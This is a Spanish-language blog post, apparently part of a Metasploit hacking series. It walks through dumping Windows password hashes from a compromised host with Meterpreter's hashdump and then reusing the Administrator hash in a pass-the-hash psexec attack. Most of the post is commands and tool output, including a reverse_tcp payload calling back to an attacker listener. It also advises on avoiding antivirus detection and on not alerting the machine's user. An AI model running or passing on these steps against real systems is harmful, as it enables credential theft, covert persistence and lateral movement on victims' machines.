Inicio > Hacking, MetaSploit > Volcado de passwords de un sistema comprometido con Meterpreter

Volcado de passwords de un sistema comprometido con Meterpreter

INTENTANDO GARANTIZAR Y MANTENER EL ACCESO A UN SISTEMA COMPROMETIDO

Una vez comprometido un sistema y elevados los privilegios de una consola, es conveniente obtener los hash correspondientes a los passwords de los usuarios de dicho sistema (o si es posible la cuenta de administrador), para hacer esto se utiliza extensión priv y posteriormente el comando hashdump de meterpreter

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::ASPNET:1004:f398e05bcb3020ceff92d55aff8ce62c:86ceb0fb2a9e29524943fed3ef434477:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::HelpAssistant:1000:4d6764bf7636541b93cef5997b8f8a9d:d266eba66369591255d597bc76155cd8:::

Owner:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

postgres:1005:f554be491f92036e46cfff875cbe001d:2b11a19bd88a25d3e2d07cb7cc362044:::

SUPPORT_388945a0″:1002:aad3b435b51404eeaad3b435b51404ee:5376b4d52202b447093e4651b63d1572:::

Como se puede apreciar el comando ha obtenido los hash correspondientes a los usuarios existentes en el sistema.

Nota: En algunos sistemas, esto puede causar la activación del antivirus ya que lo puede considerar maleware alertando de esta forma a algún usuario de la maquina objetivo, así que debe ser usado de forma responsable y solamente en aquellos casos en los cuales no alerte al usuario.

Posteriormente acceder al sistema remoto utilizando el exploit Psexec de la siguiente forma:

msf exploit(handler) > use exploit/windows/smb/psexec
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(psexec) > set LHOST 192.168.1.33

LHOST => 192.168.1.33

msf exploit(psexec) > set LPORT 443

LPORT => 443

msf exploit(psexec) > set RHOST 192.168.1.34

RHOST => 192.168.1.34

msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

Name Current Setting Required Description

—- ————— ——– ———–

RHOST 192.168.1.34 yes The target address

RPORT 445 yes Set the SMB service port

SMBDomain WORKGROUP no The Windows domain to use for authentication

SMBPass no The password for the specified username

SMBUser no The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

—- ————— ——– ———–

EXITFUNC process yes Exit technique: seh, thread, none, process

LHOST 192.168.1.33 yes The listen address

LPORT 443 yes The listen port

Exploit target:

Id Name

— —-

0 Automatic

Con el uso de este exploit y la información obtenida en el proceso de acceso y elevación de privilegios, tenemos suficientes insumos para ejecutar este exploit de una forma exitosa, como puede apreciarse, se debe establecer las opciones correspondientes al usuario y clave que hemos podido obtener anteriormente:

msf exploit(psexec) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
SMBPass => aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0

 

msf> exploit

Por otra parte, para descifrar la clave y conocerla en texto claro, es necesario utilizar herramientas como John the Ripper o OphCrack que se indicarán en próximas entradas.

Otra alternativa interesante en aquellos casos en los que un AV instalado en la maquina comprometida pueda detectar este tipo de acciones es utilizar el script post/windows/gather/hashdump este script de meterpreter retornará únicamente el hash correspondiente al usuario Administrador que es lo que despues de todo, busca un atacante en primera instancia.

meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key…
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6…
[*] Obtaining the user list and keys…
[*] Decrypting user keys…
[*] Dumping password hashes…
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  1. Aún no hay comentarios.
  1. No trackbacks yet.

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: